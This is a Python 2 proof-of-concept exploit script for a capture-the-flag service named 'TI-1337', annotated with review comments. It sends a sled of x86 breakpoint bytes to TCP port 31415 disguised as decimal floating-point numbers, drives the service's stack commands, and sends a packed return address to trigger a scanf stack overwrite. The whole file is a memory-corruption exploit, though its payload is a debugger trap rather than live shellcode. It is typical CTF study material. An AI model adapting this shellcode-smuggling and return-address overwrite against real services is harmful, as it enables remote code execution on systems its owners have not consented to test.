TI-1337 exploit
#!/usr/bin/env python
# Python 2 only: relies on the `print` statement, `raw_input()` and `xrange`.
#
# Proof-of-concept client for the "TI-1337" CTF service (gist title). It talks
# a line-based numeric protocol to TCP port 31415 and hands the service raw
# bytes disguised as decimal floating-point numbers. The exact meaning of the
# "c", "b" and "x" commands is defined by the service and is not shown here.
import os      # NOTE(review): imported but never used in this script
import sys
import socket
import struct

# Target host comes from argv[1], defaulting to localhost; the port is fixed.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if len(sys.argv) > 1:
    s.connect((sys.argv[1], 31415))
else:
    s.connect(('localhost', 31415))

# Pause so an operator can attach a debugger to the service before any input
# is delivered.
print "Press Enter to continue"
raw_input()

# 200 bytes of 0xcc (the x86 `int3` breakpoint opcode): a trap sled standing
# in for a payload, so this variant stops under a debugger rather than
# executing anything.
sc = [ 0xcc, ] * 200
# Pad with 0x90 (x86 `nop`) up to a multiple of 8. When len(sc) is already a
# multiple of 8 (200 is), this still appends a full 8 bytes of padding.
sc += [0x90, ] * (8 - (len(sc) % 8)) # pad the sc to multiples of 8 bytes
packed_sc = ''.join(map(chr, sc))
print repr(sc)
cursor = packed_sc

# Send the shellcode encoded as a double
# Each 8-byte chunk is reinterpreted as an IEEE-754 double and sent as its
# decimal text. Caveats: Python 2 `/` is integer division here, and `str()`
# of a float in Python 2 is not guaranteed to preserve all 8 underlying
# bytes through the service's re-parse — presumably tolerated here; confirm.
for i in xrange(0, len(sc) / 8):
    (d, ) = struct.unpack("d", cursor[0:8])
    print ">>", str(d)
    s.send(str(d) + '\n')
    cursor = cursor[8:]

# reset the stack index
print ">> c"
s.send("c\n")
# A single recv(1024) may return a partial reply, or block if the service
# sends nothing; acceptable for a manual PoC, not for reusable code.
print "<<", s.recv(1024)

# Nineteen "b" commands in a row, echoing whatever the service replies.
for _ in xrange(19):
    print ">> b"
    s.send("b\n")
    print "<<", s.recv(1024)

# Pack 0x603155 with "L" (native unsigned long) and present it as a double.
# "L" is 8 bytes only on LP64 platforms; where it is 4 bytes (e.g. Windows)
# unpack("d") raises struct.error because it needs exactly 8 bytes.
(rip, ) = struct.unpack("d", struct.pack("L", 0x603155))
print ">> ", str(rip)
s.send(str(rip) + "\n")
s.send("x\n") # this should trigger the scanf overwrite

# Keep the connection open until the operator is done (e.g. inspecting the
# service in a debugger). The socket is never explicitly closed.
print "Press enter to end"
raw_input()